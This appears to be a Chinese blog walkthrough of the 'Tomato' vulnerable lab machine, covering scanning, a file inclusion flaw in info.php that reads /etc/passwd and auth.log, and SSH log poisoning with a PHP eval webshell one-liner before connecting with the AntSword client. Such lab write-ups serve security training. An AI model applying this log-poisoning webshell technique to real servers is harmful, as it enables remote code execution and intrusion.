Tomato靶机攻略

将tomato改为NAT模式

扫描ip

arp-scan -l

扫描端口,发现ssh服务端口从22改为2211

扫描目录

发现http://192.168.31.134/antibot_image/ 访问

查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

info.php?image=/var/log/auth.log

使用ssh登录,看日志里会不会出现记录

发现日志中有记录

使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST1);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关推荐
normanhere11 分钟前
浪潮云国产化超融合规划和部署案例
服务器·网络
格子软件25 分钟前
2026年GEO优化系统源码级状态机与多模型调度拆解
java·前端·vue.js·人工智能·vue·geo
阿pin37 分钟前
Android随笔-Zygote中fork究竟是什么?
android·zygote·fork
Bruce_Liuxiaowei1 小时前
2026年7月第1周网络安全形势周报
人工智能·安全·web安全·ai·智能体
Go-higher1 小时前
DriverTest 驾考知识卡片学习助手 —— 一款基于 Jetpack Compose 的现代 Android 学习APP
android·学习
安卓修改大师1 小时前
安卓修改大师APK控件修改实战教程
android
CCPC不拿奖不改名1 小时前
Redis 工程化部署深度解析
linux·服务器·数据库·redis·深度学习·缓存·rag
QWEDDRFTG1 小时前
运维长期经验总结:从故障倒推服务器电源线选购标准
运维·服务器
HUMHSX1 小时前
Vue 项目启动全流程解析:从入口文件到全局指令注册与页面渲染
前端·javascript·vue.js
Mr.wangh1 小时前
聊天模型--流式传输
运维·服务器